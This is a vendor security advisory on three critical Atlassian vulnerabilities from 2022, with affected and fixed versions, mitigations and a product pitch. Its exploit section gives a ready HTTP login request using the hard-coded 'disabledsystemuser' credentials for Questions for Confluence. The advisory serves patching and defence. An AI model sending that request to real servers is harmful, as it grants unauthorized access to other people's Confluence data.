You are currently viewing Warning: Atlassian Critical Vulnerabilities Being Actively Exploited- Patch Now!

Warning: Atlassian Critical Vulnerabilities Being Actively Exploited- Patch Now!

Atlassian released patches for three critical vulnerabilities. Out of the three flaws, two impacts Confluence Server, Confluence Data Center, and some other products as well as Bamboo, BitBucket, Fisheye, and Jira, and one of the flaw impacts only Confluence Server and Data Center. Atlassian is aware that the vulnerabilities are under exploitation.

The vulnerabilities are tracked as CVE-2022-26136 (Arbitrary Servlet Filter Bypass), CVE-2022-26137 (Additional Servlet Filter Invocation), and CVE-2022-26138 (Default login). POC is available for CVE-2022-26138 “Questions For Confluence – Default Login”. At the time of writing, there is no POC available for CVE-2022-26136 or CVE-2022-26137.

Technical Details

CVE-2022-26136, CVE-2022-26137 – By sending a specially crafted HTTP request, an unauthenticated, remote attacker may be able to successfully exploit the flaws (CVE-2022-26136 and CVE-2022-26137), bypassing the authentication used by third-party apps, run any JavaScript code, and get around the cross-origin resource sharing (CORS) browser mechanism. The vendor has released a patch for these flaws.

CVE-2022-26138 – An unauthenticated remote attacker can exploit this vulnerability, by using hard-coded credentials. As a result, the attacker gets a login to the confluence and can access any page the confluence user group has access to.

The vulnerability cannot be fixed by uninstalling the Questions for Confluence application either. Users can delete or disable the “disabledsystemuser” user or apply the patch by the vendor.

Steps to Exploit CVE-2022-26138

  1. Send POST Request to “/dologin.action” endpoint.
  2. Add post data as “os_username=disabledsystemuser&os_password=disabledsystemuser6708&login=Log+in&os_destination=%2Fhttpvoid.action”
  3. This POST request will provide a login to the confluence server or data center.

POST /dologin.action HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

os_username=disabledsystemuser&os_password=disabledsystemuser6708&login=Log+in&os_destination=%2Fhttpvoid.action

Affected Versions

1.CVE-2022-26136, CVE-2022-26137:

  • Atlassian Bamboo Server and Data Center Versions < 7.2.9, 8.0.x < 8.0.9, 8.1.x < 8.1.8, 8.2.x < 8.2.4
  • Atlassian Bitbucket Server and Data Center Versions < 7.6.16, All versions 7.7.x through 7.16.x, 7.17.x < 7.17.8, All versions 7.18.x, 7.19.x < 7.19.5, 7.20.x < 7.20.2, 7.21.x < 7.21.2, 8.0.0 8.1.0
  • Atlassian Confluence Server and Data Center Versions < 7.4.17, All versions 7.5.x through 7.12.x, 7.13.x < 7.13.7, 7.14.x < 7.14.3, 7.15.x < 7.15.2, 7.16.x < 7.16.4, 7.17.x < 7.17.4, 7.18.0
  • Atlassian Crowd Server and Data Center Versions < 4.3.8, 4.4.x < 4.4.2, 5.0.0
  • Atlassian Crucible Versions < 4.8.10
  • Atlassian Fisheye Versions < 4.8.10
  • Atlassian Jira Server and Data Center Versions < 8.13.22, All versions 8.14.x through 8.19.x, 8.20.x < 8.20.10, All versions 8.21.x, 8.22.x < 8.22.4

Note: 8.22.4 is not affected, but it contains a security bug unrelated to this CVE.

  • Atlassian Jira Service Management Server and Data Center Versions < 4.13.22, All versions 4.14.x through 4.19.x, 4.20.x < 4.20.10, All versions 4.21.x, 4.22.x < 4.22.4

2.CVE-2022-26138:

  • Questions for Confluence App 2.7.34, 2.7.35, 3.0.2 for Confluence Server and Confluence Data Center

Solution

1.CVE-2022-26136, CVE-2022-26137:

  • Atlassian Bamboo Server and Data Center 7.2.x >= 7.2.9, 8.0.x >= 8.0.9, 8.1.x >= 8.1.8, 8.2.x >= 8.2.4, Versions >= 9.0.0
  • Atlassian Bitbucket Server and Data Center 7.6.x >= 7.6.16 (LTS), 7.17.x >= 7.17.8 (LTS), 7.19.x >= 7.19.5, 7.20.x >= 7.20.2, 7.21.x >= 7.21.2 (LTS), 8.0.x >= 8.0.1, 8.1.x >= 8.1.1, Versions >= 8.2.0
  • Atlassian Confluence Server and Data Center 7.4.x >= 7.4.17 (LTS), 7.13.x >= 7.13.7 (LTS), 7.14.x >= 7.14.3, 7.15.x >= 7.15.2, 7.16.x >= 7.16.4, 7.17.x >= 7.17.4, 7.18.x >= 7.18.1
  • Atlassian Crowd Server and Data Center 4.3.x >= 4.3.8, 4.4.x >= 4.4.2, Versions >= 5.0.1, Atlassian Crucible, Versions >= 4.8.10, Atlassian Fisheye, Versions >= 4.8.10
  • Atlassian Jira Server and Data Center 8.13.x >= 8.13.22 (LTS), 8.20.x >= 8.20.10 (LTS), 8.22.x >= 8.22.4, Versions >= 9.0.0
  • Atlassian Jira Service Management Server and Data Center 4.13.x >= 4.13.22 (LTS), 4.20.x >= 4.20.10 (LTS), 4.22.x >= 4.22.4, Versions >= 5.0.0

Note: 4.22.5 contains a security vulnerability, so upgrade to 4.22.6

2.CVE-2022-26138:

  • Solution 1:
    • Upgrade to Questions for Confluence App>= 2.7.38 (requires Confluence 6.13.18 through 7.16.2) or >= 3.0.5 (requires Confluence 7.16.3 and later).

Uninstalling Questions for Confluence app will not fix this issue. After the app is uninstalled, the disabledsystemuser account is not automatically deleted.

  • Solution 2:
    • Delete or disable “disabledsystemuser” account

SanerNow Advanced Vulnerability Management detects Atlassian critical vulnerabilities and fixes them; we strongly recommend applying the security update as soon as possible. Use SanerNow and keep your systems updated and secure.

Tags: , , ,